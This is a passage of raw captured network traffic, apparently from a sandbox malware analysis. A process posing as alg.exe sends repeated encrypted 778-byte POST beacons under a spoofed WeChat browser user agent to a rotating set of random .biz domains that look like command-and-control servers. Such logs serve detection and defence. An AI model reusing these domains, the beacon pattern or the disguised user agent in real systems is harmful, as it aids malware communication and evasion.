Set-Cookie: btst=2dc518f9655444dca276232d963524cd|155.94.241.188|1730129908|1730129908|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.4  49952        13.251.16.150   80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:29.288954973 CET  347                OUT        POST /qbtfbn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:29.288985968 CET | 778 | OUT | Data Raw: 1b 02 cd 19 9c 87 5b 51 fe 02 00 00 81 db e6 65 84 b3 f9 8a c4 9c 40 23 d9 49 4e 42 b6 63 e9 a0 85 21 5f 8a d5 20 10 67 94 62 75 36 5f 77 08 f6 aa a0 9b d3 d8 d7 b8 cd fd 49 fa b4 d6 37 98 a7 aa 5f d5 b6 ab 6f 99 f1 17 4d 7b 19 59 f9 c0 57 c7 8f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [Qe@#INBc!_ gbu6_wI7_oM{YW|7[X.wFCH"}V2TKRJbX>:GhLx@Cpi[&+eBy*_~r{-Q-`k *yp/RphG<3[:V/c
Oct 28, 2024 16:38:30.746256113 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ce7f15273a1f8564603b285e6b8fa4c5|155.94.241.188|1730129910|1730129910|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID: 61 | Source IP: 192.168.2.4 | Source Port: 49961 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 6732 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:31.016619921 CET | 358 | OUT | POST /qbvqktfxqsysi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:31.016639948 CET | 778 | OUT | Data Raw: 9c b3 de 3c f3 07 14 43 fe 02 00 00 56 55 36 0a 7f 8f 87 80 49 6c 47 8f 27 db b2 4c 40 69 94 66 0b 0b d3 fc 99 ff 81 af 3b 70 d6 b0 81 0e 93 52 23 10 e7 f0 fd fd 0c d1 3b 93 e5 fe de 60 de db 34 b1 12 ce f3 3b d4 d0 97 b2 a1 84 e0 b6 29 2a 6f 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <CVU6IlG'L@if;pR#;`4;)*ofxyIU]iADxNo]Ec`9kd]|geG$bvSymedV{tF@lRtR|5l1dF<"qN%
Oct 28, 2024 16:38:31.679272890 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e5d0e2bae940fb3196076ac8c3bab477|155.94.241.188|1730129911|1730129911|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID: 62 | Source IP: 192.168.2.4 | Source Port: 49964 | Destination IP: 18.246.231.120 | Destination Port: 80 | PID: 6732 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:31.704221964 CET | 344 | OUT | POST /bbx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:31.704242945 CET | 778 | OUT | Data Raw: 62 0a d4 64 5e 1d ca 36 fe 02 00 00 4e c7 9c b4 7d ad 82 6d 08 40 b8 52 19 ce 74 48 c8 fd 65 c1 6a 36 36 e9 99 aa 17 38 48 d8 29 92 19 f5 65 38 a6 21 ca 33 65 01 68 4d 39 5f 23 d6 26 f4 da 10 94 be f1 89 67 94 e6 4c ba 7c 71 45 a8 c6 ed 43 01 6a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bd^6N}m@RtHej668H)e8!3ehM9_#&gL|qECjcw_x=[&Uky(8!Q9/O4$9}mcCA< Y^Atk'RMV'~8#DOc7OsOT6s"/J)
Oct 28, 2024 16:38:32.556171894 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=624309131c28be1336b5555a3c1a11df|155.94.241.188|1730129912|1730129912|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID: 63 | Source IP: 192.168.2.4 | Source Port: 49969 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 6732 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:32.685003042 CET | 349 | OUT | POST /lpoac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:32.685168982 CET | 778 | OUT | Data Raw: d3 15 94 b6 21 5e 59 c3 fe 02 00 00 93 74 43 d1 c7 44 01 32 c6 e2 56 5b 9d 22 26 47 7a 38 93 81 f9 fc 05 87 03 0c 1f 2e 32 3f 1e c8 08 d7 0a 74 15 e0 0a 4c 5d dd f6 df d2 cb c5 82 bd a9 6d bf 64 f4 14 fc c0 4d 24 12 68 67 29 e6 7a 74 bd 8c b1 91
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !^YtCD2V["&Gz8.2?tL]mdM$hg)zt`-gpuJ9Em<VeeZnPw.\.2 &I$n:ms+xqMMbXjmVB}cS0s22[/#Hx}OK


Session ID: 64 | Source IP: 192.168.2.4 | Source Port: 49975 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 6732 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:33.359962940 CET | 351 | OUT | POST /jlqmlud HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.360002041 CET778OUTData Raw: 16 9e a2 b2 5b 44 8f 8b fe 02 00 00 f0 b6 f4 8a c8 bc 2f 2d 8b e8 0c e7 fd 3a 31 48 91 c0 cf f0 c4 5b 68 b8 a4 49 98 55 05 d9 e6 22 be a5 f4 9b 07 a7 66 78 8e e6 dd 1f b2 7d 7d 76 c3 4b f1 18 b1 d3 15 4b cc 89 a4 ec 2c db 6a 5f 46 01 94 a9 be 6c
Oct 28, 2024 16:38:34.013256073 CET  416                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:38:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=1f37de9a91e5f2470514109b65252943|155.94.241.188|1730129913|1730129913|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
65          192.168.2.4  49981        54.244.188.177  80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:34.236495018 CET  349                OUT        POST /ogfkakv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rynmcq.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 28, 2024 16:38:34.236495018 CET  778                OUT        Data Raw: 8b bd 2d 38 af 6f f2 90 fe 02 00 00 8c 04 88 15 98 59 51 a8 86 c4 d5 60 db fb c0 c8 e1 38 de ce d8 4b 9a 35 61 25 00 6b 0b 39 cf 03 01 1b 5b b6 3d 97 c0 7c f7 13 21 6a f6 91 83 1e 31 99 54 57 64 e6 ab c7 7d 9d 7f 19 b1 ce 48 ef ef bc c1 66 81 99
Oct 28, 2024 16:38:35.097230911 CET  414                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:38:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2cebecc0e9c64b84737ae8c492546df5|155.94.241.188|1730129914|1730129914|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
66          192.168.2.4  49987        3.254.94.185    80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:35.124983072 CET  347                OUT        POST /yefjfs HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: uaafd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 28, 2024 16:38:35.124983072 CET  778                OUT        Data Raw: e5 3e 16 d6 f2 f5 94 b5 fe 02 00 00 55 18 6b bb ba d2 bf f5 95 76 54 95 06 48 90 af ad 8f ba bf 85 1a e8 4e 61 de 51 89 b2 a1 f6 16 66 c4 2d f6 49 bf a5 5d 6e bd 1e 66 10 16 6a 3f b2 3e 25 42 9c 39 85 39 e8 22 f0 d7 57 31 85 3d 2d 5b 94 d3 78 87
Oct 28, 2024 16:38:36.093620062 CET  413                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:38:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e8d172438e49e52df118c599dcba83f9|155.94.241.188|1730129915|1730129915|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
67          192.168.2.4  49993        18.141.10.107   80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:36.116564035 CET  359                OUT        POST /kwcvpyammkduugr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: eufxebus.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 28, 2024 16:38:36.116594076 CET  778                OUT        Data Raw: f2 9c 5e 06 b1 79 b8 64 fe 02 00 00 58 bb c8 d8 2f 3c f4 59 78 90 67 a4 d8 3f ec 4d c2 35 fa 8c 5e 4b f5 8c 72 8c 72 8e 59 9a e8 c7 c6 34 eb d5 a6 3e 2a b7 09 6e 46 ba 47 a6 f1 e6 af 7d b7 2e 92 01 d2 2e 8a 9c 59 56 3d 67 ca ef 79 1e cc eb 8f 1b


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
68          192.168.2.4  49997        18.141.10.107   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:37.368263006 CET  360  OUT  POST /xodwswpgarjchsqy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:37.368288994 CET  778  OUT  Data Raw: 2f 77 22 8b 43 b0 5c 69 fe 02 00 00 26 64 12 c3 11 c3 67 0f 96 0b cf 4e 87 70 2f e6 4c ba d8 c0 88 3f 7d 5e 33 96 c0 eb 00 92 fb e1 91 eb 0c b2 f6 ad c7 6f 25 77 2c 34 4d 6b 6c 93 34 f6 0a 4b 73 31 a3 dc 96 55 b8 00 64 b2 2f 4a ff 80 f3 41 ec fe
Oct 28, 2024 16:38:38.804332018 CET  416  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a8d542230a0a42b5fad6623a1ca38c2d|155.94.241.188|1730129918|1730129918|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
69          192.168.2.4  50005        34.246.200.160  80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:38.827990055 CET  351  OUT  POST /wyrwafauw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:38.828011990 CET  778  OUT  Data Raw: b8 12 43 a6 87 f3 f4 d7 fe 02 00 00 90 77 87 e8 b3 0c 56 3d 68 56 8c fd fc 9a fc 7b a4 59 22 c3 51 6c 56 fe 4f ae a1 5d 67 5f 15 e8 0d 22 86 ea a3 a0 46 37 bc 4c f1 5a 50 6e df 83 e2 04 9d af c6 89 7e 80 aa fe 7b 40 70 3d 2a e6 f4 48 bd 0c 9c 18
Oct 28, 2024 16:38:40.012725115 CET  414  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b99a98667e4fd4e992b526562a043925|155.94.241.188|1730129919|1730129919|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
70          192.168.2.4  50009        47.129.31.212   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:40.261821985 CET  353  OUT  POST /lufcjqrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:40.261843920 CET  778  OUT  Data Raw: bf f6 7e cb e2 98 b8 01 fe 02 00 00 a2 bd 3e 37 cb 75 4d 05 ab 99 ec 11 32 fd af ac 6d c9 16 5a 4c ce 60 9b e0 d8 92 c8 91 b4 35 9e 40 f8 a0 11 95 86 df bf de da e9 42 46 30 07 1e b1 b0 00 b9 22 5a f5 0d 0f c8 3d cb 32 b6 50 12 74 a4 ec 1a cb 83


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
71          192.168.2.4  50014        47.129.31.212   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:41.335401058 CET  350  OUT  POST /hfjkd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:41.335414886 CET  778  OUT  Data Raw: 64 92 85 a6 0a 76 9c 5b fe 02 00 00 0d 9a 48 c2 3e 42 7f bc 3a 2e 9c 40 71 07 cb f8 84 70 30 c8 d1 c0 15 09 d0 07 e6 bf 71 e8 b9 f9 55 5d 17 72 6f 1a 5f e1 15 da 0d 18 be b9 bd 8e 04 e6 b8 33 4c c1 16 cf 01 31 83 00 8c c9 92 25 cb 40 5f 91 e3 94
Oct 28, 2024 16:38:43.556391954 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=84e9956587e46d92280dcd646c425502|155.94.241.188|1730129923|1730129923|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 50024 | 3.94.10.34 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:43.577054024 CET | 348 | OUT | POST /dpop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:43.577071905 CET | 778 | OUT | Data Raw: e3 36 54 a9 d1 50 9c 4f fe 02 00 00 c2 a7 bd 9d 86 2d 9b 41 52 35 e6 f0 46 6d 72 a4 7d e6 56 54 93 d9 c6 4b c1 cb f6 a5 29 e9 84 2c 81 6b d7 3d 16 55 66 d0 31 a6 72 08 c7 f5 34 58 5a d3 15 37 be b7 4d 1c 18 cc 28 a5 c1 d9 d4 65 4b 8b 15 27 5a f0
Data Ascii: 6TPO-AR5Fmr}VTK),k=Uf1r4XZ7M(eK'ZF8RFYEXI],5?^.['8dL~(!RX;M8w401'oEz]c3sQ.zA7hCs]d+[^$9m[;d
Oct 28, 2024 16:38:44.643255949 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=80bf27f9768f939b7205755ced2b60d9|155.94.241.188|1730129924|1730129924|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 50029 | 35.164.78.200 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:44.753194094 CET | 360 | OUT | POST /awkwgthegytbtgpc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:44.753222942 CET | 778 | OUT | Data Raw: 1f 2d 52 64 60 c4 c5 ab fe 02 00 00 8a ec b6 06 90 cb 6c ad 75 91 5a 6c 9e 3c e9 1c e9 92 f0 7d 99 a2 04 3c 6e 77 b7 ef f1 a2 1f 0a 07 9e 8b 32 48 09 2a 51 4d f9 08 9b 36 5b 55 0c 26 3e 36 03 1e 48 d0 53 1c f7 f1 bc 0c fb 46 6b 0f fe b2 86 fd 49
Data Ascii: -Rd`luZl<}<nw2H*QM6[U&>6HSFkI0;BZ~cp~`:A^?"chY{D_=RZu-*\d'8Z8OIh`Fe_u7VUO$[O#(D*nb3$8GT)
Oct 28, 2024 16:38:46.165713072 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e86a0e947e11ed5996878d887896ce71|155.94.241.188|1730129925|1730129925|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 50032 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
